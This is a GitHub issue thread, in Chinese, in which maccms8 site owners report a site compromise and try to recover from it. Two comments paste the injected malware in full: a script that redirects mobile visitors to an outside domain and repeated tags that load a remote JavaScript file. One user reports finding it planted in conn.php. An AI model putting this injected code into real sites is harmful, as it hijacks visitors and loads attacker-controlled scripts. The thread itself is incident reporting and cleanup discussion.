### ISSUE TITLE
网站又被挂马了！！！！

### ISSUE THREAD

**Issue by wangbaoqiang-lixiaolu** [magicblack/maccms8#20]
不是数据库的问题，同数据库的其他站点没有问题！
也不是模板的问题，更换了其他模板还是存在问题！
之前出现了一次这种情况，清除缓存后好了！
现在后台无法清除缓存，一直失败，敢问大佬这是什么情况

**Comment by zhengnan06577** [comment]
网站又被挂马了！！！！

**Comment by zhengnan06577** [comment]
<script>var a=navigator["userAgent"]["toLowerCase"]()["match"](/(ipod\|iphone\|ipad\|android\|coolpad\|mmp\|smartphone\|midp\|wap\|xoom\|symbian\|j2me\|blackberry\|wince)/i)!=null;if(a){window.location.href="https://tg.diaoyuds.com/?c=1257"}</script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><script src=https://www.999meiju.com/js/tjj.js></script><html>

**Comment by magicblack** [comment]
1013版本默认关闭里数据库字段过滤，可能是你们之前被挂马没有清理干净。
   后台 数据库-》挂马检测（检测至少2次）； 站点设置 -》性能 -》安全过滤开启

**Comment by istsba** [comment]
黑客可以更改网站任意目录里的文件，直接加代码了。暂时只能更改权限，最新版本也不行，全新安装也一样，太累了

**Comment by wuliannan6066** [comment]
我的也被挂马了，安全过滤没有开启，但是挂马检测我检测了很多次都没有问题的！可是还是被挂了，v8这次是加在conn和config里面的！不知道各位的和我是不是一样

**Comment by wuliannan6066** [comment]
我现在已经开启了安全过滤了，不知道会怎么样

**Comment by wangbaoqiang-lixiaolu** [comment]
> 我现在已经开启了安全过滤了，不知道会怎么样

conn和config是在那两个文件里面？

**Comment by wangbaoqiang-lixiaolu** [comment]
找到了conn.php里面被加了一行代码<script>var a=navigator["userAgent"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(a){window.location.href="https://tg.diaoyuds.com/?c=1257"}</script><script>var a=navigator["userAgent"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(a){window.location.href="https://tg.diaoyuds.com/?c=1257"}</script>

**Comment by wangbaoqiang-lixiaolu** [comment]
conn.php里的代码删除之后，始终无法清除缓存。这个怎么解决呀

**Comment by wuliannan6066** [comment]
我也是 [更新常用资源缓存]  [更新动态页面缓存] 更新失败  [更新数据缓存]这个可以更新！你们和我是一样的吗

**Comment by wangbaoqiang-lixiaolu** [comment]
> 我也是[更新常用资源缓存] [更新动态页面缓存]更新失败[更新数据缓存]这个可以更新！你们和我是一样的吗

一样的不知道为什么，网站看起来正常了。缓存无法清除

**Comment by wangbaoqiang-lixiaolu** [comment]
尝试通过之前的maccms10的转换程序转换数据库总是失败

**Comment by wuliannan6066** [comment]
> 尝试通过之前的maccms10的转换程序转换数据库总是失败

下载最新的程序，把cache里面的全部复制到自己网站里面的cache里面，缓存就能更新了
